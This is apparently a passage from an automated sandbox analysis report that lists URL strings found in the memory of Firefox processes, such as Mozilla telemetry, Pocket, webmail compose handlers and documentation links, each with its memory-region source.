                          Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ebay.comP
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sresource://gre/modules/handlers/HandlerList.sys.mj
                          Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                          Source: firefox.exe, 00000018.00000003.2742255243.000002BA5A163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
                          Source: firefox.exe, 00000018.00000002.2889075369.00002786E1B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2864606177.000002BA5D403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A72F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendationsS7
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-compiler/issues/3177
                          Source: firefox.exe, 00000018.00000002.2874426589.000002BA61B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2725783431.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2723839104.000002BA61B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
                          Source: firefox.exe, 00000018.00000002.2874426589.000002BA61B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2725783431.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2723839104.000002BA61B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/lit/lit/issues/1266
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
                          Source: firefox.exe, 00000018.00000003.2659017231.000002BA5991F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshotschrome://browser/content/parent/ext-windows.js
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/zertosh/loose-envify)
                          Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
                          Source: firefox.exe, 00000018.00000002.2792299128.000002BA49C11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://ideas.mozilla.org/
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
                          Source: firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2795803239.000002BA555BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submits
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://install.mozilla.org
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B75A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
                          Source: firefox.exe, 00000018.00000002.2822642036.000002BA5A07A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%resource://gre/modules/compone
                          Source: firefox.exe, 00000018.00000002.2841657939.000002BA5B88F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                          Source: firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: firefox.exe, 00000018.00000003.2733288614.000002BA5C08B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C08B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56BD0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2804720273.000002BA56D1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://mail.google.com/mail/?extsrc=mailto&url=%s
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%sv
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sgecko.handlerService.defaultHandlersVersionhttps://mail.inbox
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49CD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C5372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://mitmdetection.services.mozilla.com/
                          Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mochitest.youtube.com/
                          Source: firefox.exe, 00000018.00000002.2797999061.000002BA55DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/about
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/breach-details/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
